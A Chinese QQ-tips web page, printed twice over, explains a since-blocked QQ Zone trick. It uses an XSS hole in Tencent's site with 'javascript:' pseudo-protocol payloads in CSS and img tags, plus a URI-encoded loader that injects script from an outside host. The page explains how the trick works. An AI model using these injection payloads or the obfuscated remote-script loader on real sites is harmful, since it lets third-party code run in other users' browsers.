关于QQ空间最新代码被封以及代码实现原理说明
浏览次数: 998次| 发布日期:01-04 19:42:35 | QQ使用技巧
标签:qq技巧,qq空间技巧,qq空间装扮技巧,http://www.350xue.com
关于QQ空间最新代码被封以及代码实现原理说明,
发这个贴有两个目的:
一、告诉大家最新的QQ空间代码已经被封了
二、简单介绍下这次QQ空间代码实现的原理(供感兴趣的朋友研究用)
代码前几天就被封了。
由于时间问题一直没做说明趁晚上有空,介绍下这种代码的实现原理。
这次主要是利用了腾讯的XSS漏洞,
有些黑客利用这个漏洞来攻击,也就是网上所说的XSS攻击。
至于什么是XSS攻击,大家可以百度,我就简单提供一个地址:http://baike.baidu.com/view/50325.htm
介绍了这个漏洞,现在大概说一下我们这个QQ空间代码的实现步骤。
大家首先看这个最简单的代码:
1. <p style="background:url(javascript:alert('最好的QQ站-凯洛诗))">zongzi</p>
首先大家来看。
<p style="background:url(http://toolmao.cn/bg.jpg)">zongzi</p> 。这是普通的HTML语言。
这句话的作用呢就是,设置P标签的背景图片是url里面的图片。
再仔细看这个图片地址,是以 http: 开头的,这个就是超文本协议。(不懂的多百度)
再回过头来看 上面的代码。javascript:alert 。是不是跟一个网址很像呢?
这个我们叫它“伪协议”(不懂的请百度)。
javascript:alert('我是粽子')这句话就等同于<script>alert("最好的QQ站-凯洛诗")</script>
由于通过style来执行这个代码的漏洞只在IE6核心及以下可以执行。IE7已经不存在这个漏洞。所以前面我们发代码时会说明这个代码的使用范围。
还有一种变形。<img src="javascript:alert('最好的QQ站-凯洛诗')" /> 。这种类型在IE7也能执行,但早在几年前就被腾讯封掉了。(大家感兴趣的继续百度。)
继续说回QQ空间的代码-。-
其实上面那个代码就是 之前公布的 弹出欢迎代码,只要改下文字就行了。
接下来介绍怎么利用这个漏洞实现修改背景的步骤。
首先看这个代码:
1. <p style="background:url(javascript:document.body.appendChild(function(u){if(window['t']=document.createElement('script')){window['t'].src=decodeURIComponent(u)}return window['t']}('%68%74%74%70%3A%2F%2F%77%77%77%2E%68%61%6E%7A%64%2E%63%6E%2F%71%2F%71%7A%62%67%2E%61%73%70%3Fwww.hanzd.cn%3DtitleBar')))">zongzi</p>
这是一个javascript代码。用来实现加载外部js。
其他内容,大家可以去查javascript对DOM的操作部分,相信很容易就理解了。
这里有个特别的地方,不知道大家发现没有。就是:
%68%74%74%70%3A%2F%2F%77%77%77%2E%68%61%6E%7A%64%2E%63%6E%2F%71%2F%71%7A%62%67%2E%61%73%70%3Fwww.hanzd.cn%3DtitleBar
这个其实是一个外部js的地址,用了 URI编码(不懂的百度)。
主要是腾讯之前屏蔽了正常的网址,所以只能做下这样的变形。
上面这个代码加载成功属于我自己的js后,接下来你想把QQ空间改成什么样子都可以了。
我在js里面写了个加载外部CSS的代码(CSS用来改变QQ空间的外观,比如:背景、导航)
所以总结上面的,其实就三步骤:
1、先用代码加载外部js
2、利用js加载外部css
3、写css代码,实现QQ空间外观的改变。
关于QQ空间最新代码被封以及代码实现原理说明
发这个贴有两个目的:
一、告诉大家最新的QQ空间代码已经被封了
二、简单介绍下这次QQ空间代码实现的原理(供感兴趣的朋友研究用)
代码前几天就被封了。
由于时间问题一直没做说明趁晚上有空,介绍下这种代码的实现原理。
这次主要是利用了腾讯的XSS漏洞,
有些黑客利用这个漏洞来攻击,也就是网上所说的XSS攻击。
至于什么是XSS攻击,大家可以百度,我就简单提供一个地址:http://baike.baidu.com/view/50325.htm
介绍了这个漏洞,现在大概说一下我们这个QQ空间代码的实现步骤。
大家首先看这个最简单的代码:
1. <p style="background:url(javascript:alert('最好的QQ站-凯洛诗))">zongzi</p>
首先大家来看。
<p style="background:url(http://toolmao.cn/bg.jpg)">zongzi</p> 。这是普通的HTML语言。
这句话的作用呢就是,设置P标签的背景图片是url里面的图片。
再仔细看这个图片地址,是以 http: 开头的,这个就是超文本协议。(不懂的多百度)
再回过头来看 上面的代码。javascript:alert 。是不是跟一个网址很像呢?
这个我们叫它“伪协议”(不懂的请百度)。
javascript:alert('我是粽子')这句话就等同于<script>alert("最好的QQ站-凯洛诗")</script>
由于通过style来执行这个代码的漏洞只在IE6核心及以下可以执行。IE7已经不存在这个漏洞。所以前面我们发代码时会说明这个代码的使用范围。
还有一种变形。<img src="javascript:alert('最好的QQ站-凯洛诗')" /> 。这种类型在IE7也能执行,但早在几年前就被腾讯封掉了。(大家感兴趣的继续百度。)
继续说回QQ空间的代码-。-
其实上面那个代码就是 之前公布的 弹出欢迎代码,只要改下文字就行了。
接下来介绍怎么利用这个漏洞实现修改背景的步骤。
首先看这个代码:
1. <p style="background:url(javascript:document.body.appendChild(function(u){if(window['t']=document.createElement('script')){window['t'].src=decodeURIComponent(u)}return window['t']}('%68%74%74%70%3A%2F%2F%77%77%77%2E%68%61%6E%7A%64%2E%63%6E%2F%71%2F%71%7A%62%67%2E%61%73%70%3Fwww.hanzd.cn%3DtitleBar')))">zongzi</p>
这是一个javascript代码。用来实现加载外部js。
其他内容,大家可以去查javascript对DOM的操作部分,相信很容易就理解了。
这里有个特别的地方,不知道大家发现没有。就是:
%68%74%74%70%3A%2F%2F%77%77%77%2E%68%61%6E%7A%64%2E%63%6E%2F%71%2F%71%7A%62%67%2E%61%73%70%3Fwww.hanzd.cn%3DtitleBar
这个其实是一个外部js的地址,用了 URI编码(不懂的百度)。
主要是腾讯之前屏蔽了正常的网址,所以只能做下这样的变形。
上面这个代码加载成功属于我自己的js后,接下来你想把QQ空间改成什么样子都可以了。
我在js里面写了个加载外部CSS的代码(CSS用来改变QQ空间的外观,比如:背景、导航)
所以总结上面的,其实就三步骤:
1、先用代码加载外部js
2、利用js加载外部css
3、写css代码,实现QQ空间外观的改变。
关于QQ空间最新代码被封以及代码实现原理说明
[审核:三人行学习网]
- 关于QQ空间最新代码被封以及代码实现原理说明
- › 关于QQ空间最新代码被封以及代码实现原理说明
- › 关于QQ的19个绝密技巧
- › 关于QQ号码如何激活和QQ帐号激活
- 在百度中搜索相关文章:关于QQ空间最新代码被封以及代码实现原理说明
- 在谷歌中搜索相关文章:关于QQ空间最新代码被封以及代码实现原理说明
- 在soso中搜索相关文章:关于QQ空间最新代码被封以及代码实现原理说明
- 在搜狗中搜索相关文章:关于QQ空间最新代码被封以及代码实现原理说明
tag: QQ使用技巧,qq技巧,qq空间技巧,qq空间装扮技巧,电脑学习 - QQ资料 - QQ使用技巧